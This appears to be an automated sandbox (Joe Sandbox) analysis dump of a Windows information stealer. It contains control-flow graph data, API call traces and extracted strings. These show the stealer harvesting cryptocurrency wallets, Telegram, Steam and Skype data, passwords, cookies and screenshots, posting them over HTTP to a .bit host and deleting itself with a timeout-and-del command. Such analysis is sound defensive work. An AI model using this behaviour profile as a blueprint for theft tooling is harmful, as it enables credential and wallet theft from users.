40bb6c 20631->20632 20632->20622 20633 40ba38 20632->20633 20634 40ba51 20633->20634 20635 4034e4 13 API calls 20634->20635 20636 40ba66 20635->20636 20972 41030c 20971->20972 20973 4062fc 3 API calls 20972->20973 20974 41033e 20973->20974 21307 41006c 20974->21307 20977 4062fc 3 API calls 20978 41036d 20977->20978 20979 41006c 41 API calls 20978->20979 20980 41038d 20979->20980 20981 4062fc 3 API calls 20980->20981 20982 41039c 20981->20982 20983 41006c 41 API calls 20982->20983 20984 4103bc 20983->20984 20985 4062fc 3 API calls 20984->20985 20986 4103cb 20985->20986 20987 41006c 41 API calls 20986->20987 20988 4103eb 20987->20988 20989 4062fc 3 API calls 20988->20989 20990 4103fa 20989->20990 20991 41006c 41 API calls 20990->20991 20992 41041a 20991->20992 20993 4062fc 3 API calls 20992->20993 20994 410429 20993->20994 21308 410075 21307->21308 21308->21308 21309 404150 SysAllocStringLen 21308->21309 21310 410094 21309->21310 21311 404150 SysAllocStringLen 21310->21311 21312 41009c 21311->21312 21313 404150 SysAllocStringLen 21312->21313 21314 4100a4 21313->21314 21315 403e14 3 API calls 21314->21315 21319 4100d2 21315->21319 21316 403d6c 4 API calls 21316->21319 21317 403e78 3 API calls 21317->21319 21319->21316 21319->21317 21320 403798 27 API calls 21319->21320 21321 410143 21319->21321 21415 40fe00 21319->21415 21320->21319 21322 403e78 3 API calls 21321->21322 21326 41016b 21322->21326 21323 403d6c 4 API calls 21323->21326 21324 403e78 3 API calls 21324->21326 21325 40fe00 33 API calls 21325->21326 21326->21323 21326->21324 21326->21325 21327 403798 27 API calls 21326->21327 21328 4101dc 21326->21328 21327->21326 21329 410230 21328->21329 21330 403e78 3 API calls 21328->21330 21332 403bdc SysFreeString 21329->21332 21331 410211 21330->21331 21440 40e6d4 21331->21440 21333 410248 21332->21333 21334 4034e4 13 API calls 21333->21334 21335 410253 21334->21335 21337 403bf4 SysFreeString 21335->21337 21338 410263 21337->21338 21339 4034e4 13 API calls 21338->21339 
21340 41026e 21339->21340 21341 403bf4 SysFreeString 21340->21341 21342 41027e 21341->21342 21343 4034e4 13 API calls 21342->21343 21344 410289 21343->21344 21345 403bdc SysFreeString 21344->21345 21346 410294 21345->21346 21347 4034e4 13 API calls 21346->21347 21348 41029c 21347->21348 21349 403bf4 SysFreeString 21348->21349 21350 4102a9 21349->21350 21350->20977 21416 40fe08 21415->21416 21416->21416 21417 404150 SysAllocStringLen 21416->21417 21418 40fe20 21417->21418 21419 4034e4 13 API calls 21418->21419 21420 40fe36 21419->21420 21421 407228 29 API calls 21420->21421 21422 40fe41 21421->21422 21423 407a18 32 API calls 21422->21423 21437 40fe51 21423->21437 21424 40ffbd 21425 403538 27 API calls 21424->21425 21426 40ffc8 21425->21426 21427 404810 15 API calls 21426->21427 21428 40ffd6 21427->21428 21429 403508 13 API calls 21428->21429 21430 40fff0 21429->21430 21431 404810 15 API calls 21430->21431 21432 40fffe 21431->21432 21433 403bdc SysFreeString 21432->21433 21434 410006 21433->21434 21434->21319 21435 40357c 13 API calls 21435->21437 21436 4039f0 27 API calls 21436->21437 21437->21424 21437->21435 21437->21436 21438 403850 27 API calls 21437->21438 21448 405194 21437->21448 21438->21437 21441 40e6ed 21440->21441 21442 40e734 21441->21442 21458 40e694 21441->21458 21443 403508 13 API calls 21442->21443 21444 40e78e 21443->21444 21444->21329 21449 4051a6 21448->21449 21450 405239 21449->21450 21453 404804 32 API calls 21449->21453 21451 4034e4 13 API calls 21450->21451 21452 40524e 21451->21452 21452->21437 21454 405212 21453->21454 21455 403538 27 API calls 21454->21455 21456 405231 21455->21456 21457 405114 27 API calls 21456->21457 21457->21450 21459 4034e4 13 API calls 21458->21459 21460 40e6a2 21459->21460 21461 40e6ce 21460->21461 21462 403b1c 27 API calls 21460->21462 21465 40e398 21461->21465 21463 40e6b8 21462->21463 21464 40e6c8 CharToOemBuffA 21463->21464 21464->21461 21466 40e3bc 21465->21466 21467 40357c 13 API calls 21466->21467 21468 40e3dd 
21467->21468 21469 40357c 13 API calls 21468->21469 21470 40e3e8 21469->21470 21471 403b1c 27 API calls 21470->21471 21472 40e407 21471->21472 21473 403b1c 27 API calls 21472->21473 21474 40e411 21473->21474 21475 4039e8 27 API calls 21474->21475 21476 40e419 21475->21476 21477 4035d4 27 API calls 21476->21477 21478 40e4d9 21477->21478 21479 403850 27 API calls 21478->21479 21480 40e4f2 21479->21480 21481 4034e4 13 API calls 21480->21481 21482 40e4fa 21481->21482 21483 4035d4 27 API calls 21482->21483 21484 40e50a 21483->21484 21485 403850 27 API calls 21484->21485 21486 40e520 21485->21486 21487 4034e4 13 API calls 21486->21487 21488 40e528 21487->21488 21489 403508 13 API calls 21488->21489 21490 40e545 21489->21490 21490->21442 21858 413300 21857->21858 21859 413b47 21858->21859 21860 4062fc 3 API calls 21858->21860 21861 403bf4 SysFreeString 21859->21861 21862 413341 21860->21862 21863 413b64 21861->21863 22011 412d6c 21862->22011 21864 4034e4 13 API calls 21863->21864 21865 413b6c 21864->21865 21865->18287 21868 4062fc 3 API calls 21869 413372 21868->21869 21870 412d6c 50 API calls 21869->21870 21871 413392 21870->21871 21872 4062fc 3 API calls 21871->21872 21873 4133a3 21872->21873 21874 412d6c 50 API calls 21873->21874 21875 4133c3 21874->21875 21876 4062fc 3 API calls 21875->21876 21877 4133d4 21876->21877 21878 412d6c 50 API calls 21877->21878 21879 4133f4 21878->21879 21880 4062fc 3 API calls 21879->21880 21881 413405 21880->21881 21882 412d6c 50 API calls 21881->21882 21883 413425 21882->21883 21884 4062fc 3 API calls 21883->21884 21885 413436 21884->21885 21886 412d6c 50 API calls 21885->21886 21887 413456 21886->21887 21888 4062fc 3 API calls 21887->21888 21889 413467 21888->21889 21890 412d6c 50 API calls 21889->21890 21891 413487 21890->21891 21892 4062fc 3 API calls 21891->21892 22012 404150 SysAllocStringLen 22011->22012 22013 412dc7 22012->22013 22014 404150 SysAllocStringLen 22013->22014 22015 412dcf 22014->22015 22016 404150 SysAllocStringLen 
22015->22016 22017 412dd7 22016->22017 22018 403e14 3 API calls 22017->22018 22019 412dff 22018->22019 22020 412e0a FindFirstFileW 22019->22020 22039 412e13 22020->22039 22021 40776c 3 API calls 22021->22039 22022 412f52 FindNextFileW 22023 412f6a FindClose 22022->22023 22022->22039 22024 412f80 22023->22024 22025 403bf4 SysFreeString 22024->22025 22026 412f90 22025->22026 22027 4034e4 13 API calls 22026->22027 22028 412f9b 22027->22028 22030 403bf4 SysFreeString 22028->22030 22031 412fab 22030->22031 22032 4034e4 13 API calls 22031->22032 22034 412fb6 22032->22034 22033 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 22033->22039 22035 403bf4 SysFreeString 22034->22035 22037 412fc6 22035->22037 22036 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 22036->22039 22038 403bf4 SysFreeString 22037->22038 22040 412fd3 22038->22040 22039->22021 22039->22022 22039->22033 22039->22036 22041 40e6d4 28 API calls 22039->22041 22073 412974 22039->22073 22040->21868 22041->22039 22074 41297c 22073->22074 22074->22074 22075 404150 SysAllocStringLen 22074->22075 22076 412994 22075->22076 22077 403bdc SysFreeString 22076->22077 22078 4129aa GetTickCount 22077->22078 22079 40709c 4 API calls 22078->22079 22080 4129c5 22079->22080 22081 406fdc 10 API calls 22080->22081 22082 4129d0 22081->22082 22083 403e78 3 API calls 22082->22083 22084 4129e5 22083->22084 22085 4078d8 8 API calls 22084->22085 22086 4129f0 22085->22086 22087 4062fc 3 API calls 22086->22087 22088 4129fd 22087->22088 22089 403e78 3 API calls 22088->22089 22090 412a15 22089->22090 22091 4078d8 8 API calls 22090->22091 22092 412a20 22091->22092 22093 412a33 6BD67450 22092->22093 22094 412a44 22093->22094 22095 404b58 28 API calls 22094->22095 22096 412a4f 22095->22096 22097 40776c 3 API calls 22096->22097 22120 412a62 22097->22120 22098 412a66 22099 403bf4 SysFreeString 22098->22099 22100 412bf4 22099->22100 22101 4034e4 13 API calls 22100->22101 22102 412bfc 22101->22102 22103 403bf4 
SysFreeString 22102->22103 22104 412c09 22103->22104 22105 403508 13 API calls 22104->22105 22106 412c16 22105->22106 22108 403bf4 SysFreeString 22106->22108 22107 412b91 22109 403c18 3 API calls 22107->22109 22110 412c23 22108->22110 22111 412bcc 22109->22111 22113 4034e4 13 API calls 22110->22113 22115 412bd4 6BD677D0 22111->22115 22112 4034e4 13 API calls 22112->22120 22114 412c2b 22113->22114 22116 403bf4 SysFreeString 22114->22116 22115->22098 22120->22098 22120->22107 22120->22112 22121 403e78 3 API calls 22120->22121 22121->22120 22172 404150 SysAllocStringLen 22171->22172 22173 4077db 22172->22173 22174 403bdc SysFreeString 22173->22174 22175 4077f0 22174->22175 22176 407829 22175->22176 22179 403f44 4 API calls 22175->22179 22177 403bdc SysFreeString 22176->22177 22178 407845 22177->22178 22178->18975 22179->22176 22181 404150 SysAllocStringLen 22180->22181 22182 40e7b5 22181->22182 22183 40e86b 22182->22183 22184 407228 29 API calls 22182->22184 22185 403bf4 SysFreeString 22183->22185 22189 40e7f7 22184->22189 22186 40e885 22185->22186 22187 403508 13 API calls 22186->22187 22188 40e892 22187->22188 22192 403bdc SysFreeString 22188->22192 22190 40e845 22189->22190 22193 4062fc 3 API calls 22189->22193 22191 40e6d4 28 API calls 22190->22191 22194 40e850 22191->22194 22195 40e89a 22192->22195 22198 40e812 22193->22198 22196 4062fc 3 API calls 22194->22196 22195->18988 22197 40e85d 22196->22197 22199 40e865 6BD677D0 22197->22199 22200 40e823 6BD67450 22198->22200 22199->22183 22200->22190 22201 40e82d 22200->22201 22202 4062fc 3 API calls 22201->22202 22203 40e83a 22202->22203 22204 407228 29 API calls 22203->22204 22204->22190 22206 40509c 22205->22206 22207 403538 27 API calls 22206->22207 22212 4050b4 22207->22212 22208 4050f1 22209 4034e4 13 API calls 22208->22209 22211 405106 22209->22211 22210 4039e8 27 API calls 22210->22212 22211->19036 22212->22208 22212->22210 22214 413d10 22213->22214 22214->22214 22215 404150 SysAllocStringLen 22214->22215 22216 
413d26 22215->22216 22217 403bdc SysFreeString 22216->22217 22218 413d3b 22217->22218 22219 407228 29 API calls 22218->22219 22220 413d46 22219->22220 22222 403a30 27 API calls 22220->22222 22248 413dff 22220->22248 22221 403bf4 SysFreeString 22223 413ebd 22221->22223 22227 413d77 22222->22227 22224 403508 13 API calls 22223->22224 22225 413eca 22224->22225 22226 403bf4 SysFreeString 22225->22226 22228 413ed7 22226->22228 22229 403a30 27 API calls 22227->22229 22227->22248 22230 403508 13 API calls 22228->22230 22234 413d9f 22229->22234 22231 413ee4 22230->22231 22232 403bdc SysFreeString 22231->22232 22233 413eec 22232->22233 22233->19143 22235 4036cc 27 API calls 22234->22235 22234->22248 22236 413dc1 22235->22236 22237 4074e8 27 API calls 22236->22237 22238 413dd1 22237->22238 22257 413c48 22238->22257 22240 413dfb 22241 4074e8 27 API calls 22240->22241 22240->22248 22242 413e24 22241->22242 22244 403850 27 API calls 22242->22244 22243 413de4 22243->22240 22264 413ca0 22243->22264 22246 413e42 22244->22246 22247 4074e8 27 API calls 22246->22247 22249 413e52 22247->22249 22248->22221 22250 40357c 13 API calls 22249->22250 22258 404150 SysAllocStringLen 22257->22258 22259 413c58 22258->22259 22260 413c6e GetFileAttributesW 22259->22260 22261 413c87 22260->22261 22262 403bdc SysFreeString 22261->22262 22263 413c8f 22262->22263 22263->22243 22265 404150 SysAllocStringLen 22264->22265 22266 413cb0 22265->22266 22267 413cc6 GetFileAttributesW 22266->22267 22268 413c48 3 API calls 22267->22268 22269 413cdd 22268->22269 22270 403bdc SysFreeString 22269->22270 22271 413cf8 22270->22271 22271->22240 22273 416f36 22272->22273 22274 404804 32 API calls 22273->22274 22275 416f53 22273->22275 22274->22275 22276 404810 15 API calls 22275->22276 22277 416fbe GetHGlobalFromStream GlobalLock 22276->22277 22277->19186 22278->19203 22279->19208 22281 404271 22280->22281 22282 404278 22280->22282 22281->19258 22283 402614 13 API calls 22282->22283 22284 40427f 22283->22284 
22284->19258 22286 404246 22285->22286 22287 404280 15 API calls 22286->22287 22288 40425f 22286->22288 22287->22286 22288->19266 22290 403218 22289->22290 22291 4031ee 22289->22291 22290->18405 22291->22290 22299 404c1c 22291->22299 22294 403372 GetStdHandle WriteFile GetStdHandle WriteFile 22293->22294 22295 4033c9 22293->22295 22294->18404 22297 4033d2 MessageBoxA 22295->22297 22298 4033e5 22295->22298 22297->22298 22298->18404 22300 404c58 22299->22300 22301 404c35 22299->22301 22300->22291 22303 401934 22301->22303 22304 401a11 22303->22304 22305 401945 22303->22305 22304->22300 22306 401966 LocalFree 22305->22306 22307 40195c RtlEnterCriticalSection 22305->22307 22308 401999 22306->22308 22307->22306 22309 401987 VirtualFree 22308->22309 22310 4019a1 22308->22310 22309->22308 22311 4019c8 LocalFree 22310->22311 22312 4019df 22310->22312 22311->22311 22311->22312 22313 4019f5 RtlLeaveCriticalSection 22312->22313 22314 4019ff RtlDeleteCriticalSection 22312->22314 22313->22314 22314->22300 22315 40a6aa 22316 40a6b5 LoadLibraryA GetProcAddress 22315->22316 22317 40a6cf 22315->22317 22316->22317 22318 60013f 22326 601180 GetPEB 22318->22326 22321 6002a0 22328 6002ad 22321->22328 22323 600169 22324 60295b 22323->22324 22332 600443 22323->22332 22327 600145 SetErrorMode SetErrorMode 22326->22327 22327->22321 22327->22323 22330 602944 22328->22330 22329 60295b 22330->22329 22331 600443 GetPEB 22330->22331 22331->22329 22333 601180 GetPEB 22332->22333 22334 600449 22333->22334 22335 60231f 22336 602439 VirtualAllocEx 22335->22336 22337 60242d 22335->22337 22338 603279 22336->22338 22337->22336 22341 602460 GetPEB 22338->22341 22340 60327e 22342 602471 22341->22342 22342->22340 22343 60018f 22344 601180 GetPEB 22343->22344 22345 600283 22344->22345 22346 600289 VirtualAllocEx 22345->22346 22346->22346 22347 6002a0 22346->22347 22348 6002ad GetPEB 22347->22348 22349 602807 22348->22349 22350 600443 GetPEB 22349->22350 22351 60295b 22349->22351 22350->22351

Control-flow Graph
APIs
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00418771
  • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
  • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
  • Part of subcall function 00409668: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
  • Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
  • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
  • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
• GetSystemMetrics.USER32(00000001), ref: 00418B2C
• GetSystemMetrics.USER32(00000000), ref: 00418B34
• ExitProcess.KERNEL32(00000000), ref: 00419677
Strings
Memory Dump Source
• Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_update.jbxd
Yara matches
Similarity
• API ID: CreateDirectory$AddressMetricsProcSystem$CurrentExitLibraryLoadMutexProcess
• String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
• API String ID: 1296064569-3281574059
• Opcode ID: dd4a759874b448f673d2a4fd46c1203918a6d0ae002507f4010e9563ca01a716
• Instruction ID: 3797f177b1bbe09be7fd524c5594b962f7777058f818ea16023579e3bd1f6f93
• Opcode Fuzzy Hash: dd4a759874b448f673d2a4fd46c1203918a6d0ae002507f4010e9563ca01a716
• Instruction Fuzzy Hash: 43A20A34A002199BDB10EB55CC91BDDB7B5EF49304F5080BBF408BB291DB78AE868F59

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041724F
• GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417255
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417269
• GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041726F
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417283
• GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417289
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041729D
• GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172A3
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 004172B7
• GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172BD
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172D1
• GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D7
• LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172F1
                                                                                                            • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417305
                                                                                                            • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041730B
                                                                                                            • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 0041731F
                                                                                                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417325
                                                                                                            • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417339
                                                                                                            • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041733F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                            • API String ID: 2574300362-2815069134
                                                                                                            • Opcode ID: 1b50f59bb49dcc1b6f823cd8cbb9f8804222f8caf113522e52f3969ecb9f36f5
                                                                                                            • Instruction ID: a98f21beb08f5e7a8693b8482d73447dd3fc81d530b02daa868018d23397fb24
                                                                                                            • Opcode Fuzzy Hash: 1b50f59bb49dcc1b6f823cd8cbb9f8804222f8caf113522e52f3969ecb9f36f5
                                                                                                            • Instruction Fuzzy Hash: 2011FEF06D8304B9C60077F2FC47A9A2A797685709321453BBE10F20E2C57C6881979D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,004182B2,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00417E2F
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,004182B2,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00417E43
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E57
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E6C
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E81
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E96
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417EAB
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EC0
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417ED5
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417EEB
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417F02
                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FEE
                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 0041807F
                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180BF
                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041811C
                                                                                                            • HttpSendRequestA.WININET(00000000,004183EC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 0041816D
                                                                                                            • InternetReadFile.WININET(00000000,?,00010064,?,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 00418198
                                                                                                            • InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,00418815,00000000), ref: 004181CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackFileLibraryLoadModuleReadSend
                                                                                                            • String ID: .bit$C9896252$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                                                                                                            • API String ID: 2047011702-652187286
                                                                                                            • Opcode ID: 62ba9a3a62b01f8bc841a524288261099d10986cac07bda2f365372dd205522c
                                                                                                            • Instruction ID: 801840e1656a921475aa8d836ade25f441fe318e6b6fe0a913a22531e032b4b7
                                                                                                            • Opcode Fuzzy Hash: 62ba9a3a62b01f8bc841a524288261099d10986cac07bda2f365372dd205522c
                                                                                                            • Instruction Fuzzy Hash: 26E1FEB1910208ABDB10EFA5CC46BDEBBBCBF48305F10457AF504B7691DB78AA45CB58

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938
                                                                                                            • Opcode ID: 153c94e531e4f0db284edc14d15d82e136f5b961d9b809ca98405f4227d7910d
                                                                                                            • Instruction ID: 67278170e91c31cc6e542a24f092c99a4e60002f621039dc7dfe152e0641e341
                                                                                                            • Opcode Fuzzy Hash: 153c94e531e4f0db284edc14d15d82e136f5b961d9b809ca98405f4227d7910d
                                                                                                            • Instruction Fuzzy Hash: 679184709001199BCB10EF99C985ADEB7B9FF84304F2181BAE509B7291D739EF858F58
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00409B45,?,?,?,?,00419502), ref: 00409A0B
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00409B45,?,?,?,?,00419502), ref: 00409A3A
                                                                                                            • FindNextFileW.KERNELBASE(00000000,?,?,?,?,?,00419502), ref: 00409ADA
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409AEC
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409B11
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,00419502), ref: 00409B25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
